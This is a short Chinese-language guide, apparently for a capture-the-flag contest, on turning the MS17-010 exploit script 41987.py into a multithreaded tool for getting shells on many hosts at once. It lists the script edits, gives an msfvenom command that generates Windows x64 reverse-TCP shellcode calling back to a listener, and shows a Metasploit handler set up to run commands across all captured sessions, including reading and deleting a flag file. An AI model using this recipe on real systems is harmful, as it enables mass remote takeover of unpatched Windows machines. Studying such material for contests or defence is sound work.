41987.py+msfvenom+handler 实现批量get shell
基于41987.py文件
一、17010攻击CVE脚本
使用searchsploit 命令查找ms17-010的系统自带漏洞脚本
找到41987.py,保留源文件不动,复制出来
对41987.py进行修改:
- 导入线程threading模块
- Mod_replay函数处添加参数(user_shellcode)
- 注释掉原shellcode一行
- 添加shellcode=user_shellcode
- 主函数处添加(hostip)参数
- 主函数下添加 user_shellcode=open(‘shellcode文件名’,’rb’).read()
- 参数传入函数 mod_replay(user_shellcode)
- 注释掉 os.remove(“smb.dat”) 这行,会影响多线程
- 注释掉main读数据的这行
- 添加hostip,写成threading
二、SHELLCODE生成
通过命令生成shellcode
Msfvenom –p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxx –f raw > shell
三、MSF handler监听设置
打开msf,设置对应的payload
exploit –zj
-zj参数让返回的会话在后台
Sessions –c “type C:\flagvalue.txt && 其他操作”
-c 参数对所有会话执行命令,即可get flag值以及del flag